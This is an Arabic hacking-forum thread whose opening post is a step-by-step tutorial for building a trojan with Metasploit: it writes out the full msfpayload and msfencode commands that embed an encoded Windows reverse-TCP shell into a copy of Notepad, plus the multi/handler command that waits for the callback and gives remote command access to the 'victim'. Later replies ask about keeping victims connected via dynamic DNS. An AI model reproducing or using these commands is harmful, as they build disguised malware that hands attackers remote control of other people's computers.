المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : تكوين وتشفير سيرفر بالميتا وتبليغ من خلال الإتصال العكسي



BLACK.JaGuAr
02-26-2010, 06:36 PM
http://www.samygames.com/forumim/basmla/68565.gif
http://www.samygames.com/forumim/slam/6867867.gif


تحية لكم ياأعضاء منتديات جيوش الهكرز ، اليوم إن شاء الله راح نتناول موضوع جديد ولم يسبق وأن طرح يعني جميع الحقوق محفوظة لمنتديات جيوش الهكرز ....


مثل ماذكرنا لاحقا راح نقوم بتكوين ملف عبارة عن سيرفر وسوف نقوم بتشفيرة ومن ثم تجربة التبليغ ، تم تطبيق النظرية ببرنامج metasploit الإصدار رقم 3-3 لنتابع الشرح من خلال الصور


راح نستخدم أداة cygwin shell المرفقة مع البرنامج ونقوم بالوصول اليها وفتحها كما هو موضح في الصورة التالية:


http://www.aljyyosh.info/upfiles/DOp14956.jpg


بعد مانفتح الأداة نكتب الأمر التالي لمعاينة خيارات البايلودات المتاحة :


msfpayload -h


وسيتم تحديد استخدام البايلود المتاح كما في الصورة التالية :



http://www.aljyyosh.info/upfiles/cQO14956.jpg



بعد ذلك سنقوم باستعراض الأوامر المساعدة لأمر التشفير من خلال كتابتنا للكود التالي :


msfencode -h


وسوف تظهر لنا الأوامر المساعدة كما هو موضوح بالصورة التالية :



http://www.aljyyosh.info/upfiles/z3i14957.jpg


من خلال ماسبق سنقوم باستعراض قائمة التشفير المتاحة لإستخدام أفضلها ، ونقوم بكتابة الأمر التالي لعرض القائمة :


msfencode -l


وبموجب الأمر السابق سيتم ظهور قائمة بالتشفير سيتم استخدامنا لكود التشفير المحدد برقم 2 كما في الصورة التالية :



http://www.aljyyosh.info/upfiles/6lj15107.jpg


الأن حددنا نقطتين سيتم استخادمها وبقي لنا نقطة وهي معرفة خيارات module للأوامر المساعدة للأكسبلويت ، ونقوم باستعراضها من خلال الأمر التالي :


msfcli -h


وبموجب ذلك سوف تظهر لنا الأوامر المساعدة لعرض الخيارات كما بالصورة التالية :



http://www.aljyyosh.info/upfiles/Dv614957.jpg


سنقوم باستخدام الأمر s مع البايلود الذي حددناه في أول خطوة لعرض الخيارات ويهمنا فيها خيارات التبليغ ، ونطبق ذلك من خلال الأمر التالي :


msfpayload windows/shell/reverse_tcp s


من خلال الأمر السابق سوف تظهر لنا خيارات كما في الصورة التالية :




http://www.aljyyosh.info/upfiles/z3i14957.jpg


حلو الأن عرفنا كافة المعلومات إلي راح نحتاجها وبقي لنا قبل التطبيق ، أن نقوم بتوفير أي برنامج لنحوله إلى سيرفر ، أنا أخترت برنامج المفكرة تبع الويندوز ( notepad ) وسوف نقوم بتوفيرها من خلال نسخها من مجلد windows الموجود بالقرص سي ولصقها داخل مجلد ( black ) في برنامج الميتاسبلويت طبعا اسم المجلد عندي بلاك يعني بحسب المستخدم ، الصور التالية ستوضح لكم الفكرة بشكل ممتاز ، لنتابع



http://www.aljyyosh.info/upfiles/TgQ15107.jpg


http://www.aljyyosh.info/upfiles/ZOk15107.jpg


الأن نجي لأمر تطبيق النقاط السابقة بشكل كامل ، بمعنى تحديد بايلود التبليغ وكود التشفير والأي بي تبعنا او الهوست لإستقبال الإتصال بالإضافة إلى تحديد المنفذ ، ويتم كل ذلك من خلال كتابتنا للأمر التالي :


msfpayload windows/shell/reverse_tcp LHOST=89.189.94.49 LPORT=31337 R | msfencode -x NOTEPAD.exe -t exe -e x86/shikata_ga_nai -o reverseNOTEPAD.exe


مثل ماتشوفوا حددنا كافة الخيارات بالإضافة إلى صيفة الملف الناتج وهو تنفيذي ، والصورة التالية توضح تنفيذنا للأمر



http://www.aljyyosh.info/upfiles/MaO15107.jpg


وحتى نتأكد من أنه تم تنفيذ الأمر نذهب لمجلد المستخدم داخل مجلدات برنامج الميتا في نفس المكان الذي لصقنا فيه المفكرة وفي حالة نجاح الأمر بإذن الله سوف تظهر لنا النتيجة كما بالصورة التالية



http://www.aljyyosh.info/upfiles/KMp15107.jpg


مثل ماشفنا العملية نجحت والحمد لله وأصبح لدينا مفكرتين وحدة تبع الوبندوز الأصل والأخرى نحن قمنا بتكوينها ، وفيما يلي صورة توضح المقارنة بين المفكرتين وهي تدل على أن النسخة الذي قمنا بتكوينها مطابقة للنسخة الأصلية ....


http://www.aljyyosh.info/upfiles/hQF15215.jpg



ياسلام شغل نظيف جدا ، الأن نقوم وقبل تجريب التبليغ نقوم بكتابة الكود التالي لتشغيل الأكسبلويت :


msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=89.189.94.49 LPORT=31337 E


إذا كانت خطواتنا صح سوف يظهر لنا قبول التنفيذ كما في الصورة التالية :


http://www.aljyyosh.info/upfiles/rO815215.jpg


ياسلام تم تشغيل الإكسبلويت ، الأن الأكسبلويت بانتظار التبليغ ، وكيف يجي التبليغ ؟؟؟ طبعا يجي اذا قمنا بفتح السيرفر الذي قمنا بتكوينه وهو المفكرة المزورة ، والصورتين التالية توضح ماذا يحدث عند فتح السيرفر ووصول التبليغ وعملية التطبيق



http://www.aljyyosh.info/upfiles/Cq715215.jpg


الصورة السابقة توضح تطبيق الأكسبلويت وظهور التبليغ والمنفذ المفتوح ومن ثم ظهور نافذة دوس الخروف وبالتالي امكانية تطبيقنا لكافة اوامر الدوس على جهاز الخروف ..


http://www.aljyyosh.info/upfiles/kdV15215.jpg


نسأل الله أن نكون قد وفقنا بشرح الموضوع ، وأذكر بأن جميع الحقوق محفوظة لمنتديات جيوش الهكرز ، وإلى لقاء أخر إن شاء الله في موضوع حصري جديد


ودمتم سالمين

هاوي حنانك
02-27-2010, 12:58 AM
شرف لي أن اكون اول من يرد على هذا الموضوع المميز والحصري ,,,,دائما تبهرنا بمواضيعك الرااائعه

والتي لها الاثر الملموس في رقي هذا الصرح الشامخ ,,,,,,

دمت في تألق وابداع ,,,,

Mr.Killer
02-27-2010, 01:09 AM
مشكوووووور والله يعطيك الف عافيه

only4you
02-27-2010, 04:10 AM
مشكوووور على هذا الموضوع الرائع
واتمنى منك ان تستمر على هذا المنوال

haitham5
02-27-2010, 07:57 AM
مشكووووور اخي بلاك

ASDELY-ScOrPiOn
02-27-2010, 12:27 PM
موضوع في قمة الروعة
الله عليك يا إبن اليمن

مبدع كما عودتنا جميعا

إلى الأمام

تحياتي لك...

New0h
02-28-2010, 01:45 PM
شكرا يا بيه ع الشرح ،، و سؤالين لو سمحت ...

-------- الأول --------
أول حاجه في تكوين ال PayLoad كان ال LHOST = 89.189.94.49
و مع ذلك ال session مفتوحه علي جهاز أخر (89.189.95.20) هو Attacker و ال Victim في نفس الوقت... السبب إيه ؟؟؟؟
----------------------

-------- الثاني --------
إستشارة قانونيه يا كبير : هل ينفع نستخدم ال no-ip أو أي طريقه لعمل PayLoad يتصل بالإسم بدل ال IP ... يعني مثلا:
بدل ما نكون ال PayLoad بالطريقه دي:
..... PAYLOAD=windows/shell/reverse_tcp LHOST=89.189.94.49 LPORT=31337 ......
نكتبها كده:
.... PAYLOAD=windows/shell/reverse_tcp LHOST=example.no-ip.biz LPORT=31337 ......
و لو ما ينفعش ، هل فيه وسيله أخري .. الغرض هو إني أضمن ثبات الضحيه في حالة إذا ما تغير ال IP بتاعي (علي أساس إني الهاكر !!)
------------------------

منتظر ردك ، و تسلم إيدك ع الشرح الجميل ....

بقول لك إيه :p
إنت بتستخدم برنامج إيه في تصوير الشاشه ... ؟؟؟ اللي بيعمل الأسهم و الترقيمات دي ؟؟؟؟؟

BLACK.JaGuAr
02-28-2010, 03:02 PM
شكرا يا بيه ع الشرح ،، و سؤالين لو سمحت ...

-------- الأول --------
أول حاجه في تكوين ال PayLoad كان ال LHOST = 89.189.94.49
و مع ذلك ال session مفتوحه علي جهاز أخر (89.189.95.20) هو Attacker و ال Victim في نفس الوقت... السبب إيه ؟؟؟؟
----------------------
بالنسبة جا بسبب اني كملت الشرح ثاني يوم وكان الاي بي وقتها تغير المهم في هذة النقطة هو الهوست ، حتى وان كان تبع النو اي بي
-------- الثاني --------
إستشارة قانونيه يا كبير : هل ينفع نستخدم ال no-ip أو أي طريقه لعمل PayLoad يتصل بالإسم بدل ال IP ... يعني مثلا:
بدل ما نكون ال PayLoad بالطريقه دي:
..... PAYLOAD=windows/shell/reverse_tcp LHOST=89.189.94.49 LPORT=31337 ......
نكتبها كده:
.... PAYLOAD=windows/shell/reverse_tcp LHOST=example.no-ip.biz LPORT=31337 ......
و لو ما ينفعش ، هل فيه وسيله أخري .. الغرض هو إني أضمن ثبات الضحيه في حالة إذا ما تغير ال IP بتاعي (علي أساس إني الهاكر !!)
------------------------

منتظر ردك ، و تسلم إيدك ع الشرح الجميل ....

بقول لك إيه :p
إنت بتستخدم برنامج إيه في تصوير الشاشه ... ؟؟؟ اللي بيعمل الأسهم و الترقيمات دي ؟؟؟؟؟

برنامج SnagIt 9

New0h
02-28-2010, 03:07 PM
ألف شكر علي الرد و الإهتماااام ...
بس إنت ما رديتش علي سؤالي التاني :: بخصوص النو آي بي مع تكوين الباي لوود ؟؟؟؟؟؟
أو طريقه لتثبيت الضحايا لما أنفذ الإختراق علي جهاز في شبكة خارجيه (wan) ... منتظرك يا زعيم

nop
03-20-2010, 11:18 AM
اخوي الصور ما تظهر ممكن لو تعيد ارفاق الصور لو سمحت

millen!um
12-20-2010, 10:52 PM
مشكور أخي بلاك على الموضوع الرائع أنا جربت الطريقة و الحمد لله تعمل بشكل جيد

bibs07
01-06-2011, 01:47 AM
تشكر والله

bibs07
02-17-2011, 04:24 AM
ابداع الله يثبتك

Resident Evil
02-17-2011, 11:30 PM
اللـــه علـيك ياملك شرح آحترافي دمت للجــيوووش

Crazy.meta
03-03-2011, 02:42 PM
ثانكس يا كنق

askemo24
11-12-2011, 02:36 AM
اقسم بالله اني مقهور
ماني عارف اي شئ وابي اتعلم ولا فيه احد يعلمني الدروس مااعرف لها ياليت واحد يكلمني ويفهمني لأنه اذا اساسا بعض المصطلحات مااعرفها كيف افهمها؟؟

samilakehal
11-24-2011, 02:46 PM
والله ممتاز يا اخي على الموضوع يا غالي

عراقي الهوا
01-30-2012, 09:05 PM
الف شكر على الشرح

رمز الهكر
02-16-2012, 07:51 PM
الصور تظـــــــــــــهر اخوي مشكووور يا غالي

haker emo
02-26-2012, 06:52 PM
مشكورررررررررررررررررررر

0zeko0
02-26-2012, 11:12 PM
بارك الله فيك اخي دايما مواضيعك مميزة ي كبير تحياتي لك~

zaizo max
03-03-2012, 02:46 AM
ديما اقول مش غريبة ان تكون دى شروحاتك
شكرااااااااااا على معلوماتك ولو ان الرد اكيد متاخر جدا

jihad110
03-10-2012, 09:49 PM
شكرا على الشرح

sssssss
03-10-2012, 11:03 PM
مشكووووووووووووور يا مبدع:):):cool:

jaroud007
04-15-2012, 12:09 AM
مشكور اخي و جزاك الله الف خيرو الله االله ينورك اخي جميل
تقبل مروري موفق بإذن الله ... لك مني أجمل تحية .

....قَالَ رَسُولُ اللَّهِ صلى الله عليه وسلم ‏
(("‏‏ مَنْ سُئِلَ عَنْ عِلْمٍ فَكَتَمَهُ أَلْجَمَهُ اللَّهُ بِلِجَامٍ مِنْ نَارٍ يَوْمَ الْقِيَامَةِ ‏"‏‏ )).

فَقَاتِلْ فِي سَبِيلِ اللَّهِ لا تُكَلَّفُ إِلا نَفْسَكَ وَحَرِّضِ الْمُؤْمِنِينَ
عَسَى اللَّهُ أَنْ يَكُفَّ بَأْسَ الَّذِينَ كَفَرُوا وَاللَّهُ أَشَدُّ بَأْسًا وَأَشَدُّ تَنْكِيلا

وقوله تعالى :

[ وَلاَ تَحْسَبَنَّ الَّذِينَ قُتِلُواْ فِي سَبِيلِ اللّهِ أَمْوَاتاً بَلْ أَحْيَاء عِندَ رَبِّهِمْ يُرْزَقُونَ{169} فَرِحِينَ بِمَا آتَاهُمُ اللّهُ مِن فَضْلِهِ وَ يَسْتَبْشِرُونَ بِالَّذِينَ لَمْ

يَلْحَقُواْ بِهِم مِّنْ خَلْفِهِمْ أَلاَّ خَوْفٌ عَلَيْهِمْ وَلاَ هُمْ يَحْزَنُونَ{170} يَسْتَبْشِرُونَ بِنِعْمَةٍ مِّنَ اللّهِ وَفَضْلٍ وَأَنَّ اللّهَ لاَ يُضِيعُ أَجْرَ الْمُؤْمِنِينَ{171} ]

سورة آل عمران

( قُلْ إِنَّ صَلَاتِي وَنُسُكِي وَمَحْيَايَ وَمَمَاتِي لِلَّهِ رَبّ الْعَالَمِينَ، لَا شَرِيكَ لَهُ وَبِذَلِكَ أُمِرْتُ وَأَنَا أَوَّلُ الْمُسْلِمِينَ )

صدق الله العضيم
سبحان الله عدد ما كان وعدد ما سيكون وعدد الصمت والسكون
الا ان حزب الله هم الغالبون
لن تركع امة قائدها محمد (ص)

لا تأسف على الزمان لطالما بلت على جتث الاسود كلاب لا قصدها ان تعلوا على اسياديها تبقى الاسود أسود وكلاب كلا تبقى الاسود

مخيفة في اسرها حتى وان نبحت عليها الكلاب

قـُل مآشئـت في مسبتـي فسكُوتي عن آلحقيـرٍ .. جوٍآإب ..
ليس ضعفا مني ولكن مامن اسد يرد على خطب..الكلاب ...
تعلم للمنفعة أو لرد الضرر
مشكور اخي
__________________
قال: الرسول صلى الله عليه وسلم

1- { من ترك صلاة الفجر فليس في وجه نور }
2- { من ترك صلاة الظهر فليس في رزقة بركه }
3- { من ترك صلاةالعصرفليس في جسمه قوة }
4- { من ترك صلاة المغرب فليس في أولادة ثمرهـ}
5- { من ترك صلاة العشاء فليس فينومه رأحه}
مشكور اخي

قال رسول الله صلى الله عليه وآله وسلم : 'الحمد لله الذي تواضع كلُّ شيء لعظمته، الحمد لله الذي استسلم كلُّ شيء لقدرته، الحمد لله الذي ذلَّ كلُّ شيء لعزته، الحمد لله الذي خضع كل شيء لملكه
من قال هذا الدعاء مرة واحدة، تكتب له 1000 حسنة ويرفع به 1000 درجة، ويوكل الله له 70000 ملك يستغفرون له إلى يوم القيامة .
حق على من سمع هذا الدعاء يعلمه لغيره ……والدال على الخير كفاعله
لا تحسبوا رقصي بينكم طربا ***فإن الطير يرقص مدبوحا من شدة الإلم

sssssss
05-13-2012, 02:33 PM
مشكوووووور ابداع +تالق مرسي واصل

سارة الغامدي
10-01-2012, 09:27 PM
يسلمؤؤؤؤؤؤ .

sarahassan
10-02-2012, 09:17 PM
عاشت الايااااااادي

sarahassan
10-02-2012, 10:41 PM
ابداااااااااااع

haker.abode
10-16-2012, 08:42 PM
شكرااا على جهودك شرح مفصل وممتاز وواضح واصل الإبداع يامبدع

ندى العنزي
10-18-2012, 12:26 AM
مشكووووووووور يعطيك العافيه

هكرووك
10-18-2012, 04:24 AM
مشكوووووووووووووووور